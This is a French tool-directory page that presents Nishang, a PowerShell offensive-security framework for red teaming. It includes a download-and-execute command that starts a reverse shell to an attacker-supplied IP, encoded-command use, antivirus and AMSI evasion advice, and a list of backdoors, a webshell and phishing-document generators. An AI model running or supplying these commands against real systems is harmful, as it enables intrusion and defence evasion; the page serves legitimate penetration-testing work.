Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nishang — Nishang - PowerShell offensif pour l'équipe rouge, les tests de pénétration et la sécurité offensive. | Kitploit
Outils/GitHubGitHub/samratashok/nishang
Cassage de Mots de PasseOutils de PhishingEscalade de PrivilègesGénération de PayloadsExploitationMouvement LatéralExfiltration de DonnéesCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et Contrôle
10.0k2.5k129il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Red Teaming
GitHubsamratashok/nishang

nishang

Nishang - PowerShell offensif pour l'équipe rouge, les tests de pénétration et la sécurité offensive.

Voir le dépôt

Nishang

Nishang est un framework et une collection de scripts et de payloads qui permet d'utiliser PowerShell pour la sécurité offensive, les tests de pénétration et le red teaming. Nishang est utile pendant toutes les phases des tests de pénétration.

Par Nikhil Mittal Fondateur de Altered Security - Formation pratique au red team et à la sécurité d'entreprise !

Utilisation

Importer tous les scripts dans la session PowerShell actuelle (PowerShell v3 et ultérieur).

PS C:\nishang> Import-Module .\nishang.psm1

Utiliser les scripts individuels avec le dot sourcing.

PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Pour obtenir de l'aide sur un script ou une fonction, utilisez :

PS C:\nishang> Get-Help [scriptname] -full

Notez que l'aide est disponible pour la fonction chargée après l'exécution du script et non pour le script lui-même depuis la version 0.3.8. Dans tous les cas, le nom de la fonction est le même que celui du script.

Par exemple, pour voir l'aide sur Get-WLAN-Keys.ps1, utilisez

PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Anti-Virus

Les scripts Nishang sont détectés comme malveillants par de nombreux antivirus. Les scripts sur une cible sont destinés à être utilisés en mémoire, ce qui est très facile à faire avec PowerShell. Deux méthodes de base pour exécuter des scripts PowerShell en mémoire :

Méthode 1. Utiliser le téléchargement et l'exécution en mémoire : Utilisez la commande ci-dessous pour exécuter un script PowerShell à partir d'un shell distant, d'un shell natif meterpreter, d'un web shell, etc., et la fonction qu'il exporte. Tous les scripts de Nishang exportent une fonction du même nom dans la session PowerShell actuelle.

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Méthode 2. Utiliser le paramètre -encodedcommand (ou -e) de PowerShell Tous les scripts de Nishang exportent une fonction du même nom dans la session PowerShell actuelle. Assurez-vous donc que l'appel de fonction est effectué dans le script lui-même lors de l'utilisation du paramètre encodedcommand à partir d'un shell non PowerShell. Pour l'exemple ci-dessus, ajoutez un appel de fonction (sans guillemets) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

Encodez le script en utilisant Invoke-Encode de Nishang :

PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Données encodées écrites dans .\encoded.txt

Commande encodée écrite dans .\encodedcommand.txt

À partir de ce qui précède, utilisez le script encodé depuis encodedcommand.txt et exécutez-le sur une cible où des commandes peuvent être exécutées (un shell distant, un shell natif meterpreter, un web shell, etc.). Utilisez-le comme ci-dessous :

C:\Users\target> powershell -e [encodedscript]

Si les scripts sont toujours détectés, changer les noms des fonctions et des paramètres et supprimer le contenu d'aide aidera.

Si l'AMSI de Windows 10 bloque toujours l'exécution du script, consultez ce blog : http://www.labofapenetrationtester.com/2016/09/amsi.html

Scripts

Nishang contient actuellement les scripts et payloads suivants.

ActiveDirectory

Set-DCShadowPermissions

Modifier les objets AD pour fournir les permissions minimales requises pour DCShadow.

Antak - the Webshell

Antak

Exécuter des scripts PowerShell en mémoire, exécuter des commandes, et télécharger et uploader des fichiers en utilisant ce webshell.

Backdoors

HTTP-Backdoor

Un backdoor pouvant recevoir des instructions de sites tiers et exécuter des scripts PowerShell en mémoire.

DNS_TXT_Pwnage

Un backdoor pouvant recevoir des commandes et des scripts PowerShell via des requêtes DNS TXT, les exécuter sur une cible, et être contrôlé à distance à l'aide de ces requêtes.

Execute-OnTime

Un backdoor pouvant exécuter des scripts PowerShell à un moment donné sur une cible.

Gupt-Backdoor

Un backdoor pouvant recevoir des commandes et des scripts depuis un SSID WLAN sans s'y connecter.

Add-ScrnSaveBackdoor

Un backdoor pouvant utiliser l'économiseur d'écran Windows pour l'exécution de commandes et de scripts à distance.

Invoke-ADSBackdoor

Un backdoor pouvant utiliser des flux de données alternatifs et le registre Windows pour assurer la persistance.

Add-RegBackdoor

Un backdoor utilisant la technique bien connue du débogueur pour exécuter un payload avec les touches rémanentes et Utilman (touche Windows + U).

Set-RemoteWMI

Modifier les permissions des espaces de noms DCOM et WMI pour autoriser l'accès à un utilisateur non administrateur.

Set-RemotePSRemoting

Modifier les permissions de PowerShell remoting pour autoriser l'accès à un utilisateur non administrateur.

Bypass

Invoke-AmsiBypass

Implémentation de méthodes publiquement connues pour contourner/éviter AMSI.

Client

Out-CHM

Créer des fichiers CHM infectés capables d'exécuter des commandes et scripts PowerShell.

Out-Word

Créer des fichiers Word et infecter des fichiers existants pour exécuter des commandes et scripts PowerShell.

Out-Excel

Créer des fichiers Excel et infecter des fichiers existants pour exécuter des commandes et scripts PowerShell.

Out-HTA

Créer un fichier HTA pouvant être déployé sur un serveur web et utilisé dans des campagnes de phishing.

Out-Java

Créer des fichiers JAR signés pouvant être utilisés avec des applets pour l'exécution de scripts et de commandes.

Out-Shortcut

Créer des fichiers de raccourci capables d'exécuter des commandes et scripts PowerShell.

Out-WebQuery

Créer des fichiers IQY pour le phishing d'identifiants et de hash SMB.

Out-JS

Créer des fichiers JS capables d'exécuter des commandes et scripts PowerShell.

Out-SCT

Créer des fichiers SCT capables d'exécuter des commandes et scripts PowerShell.

Out-SCF

Télécharger l’outil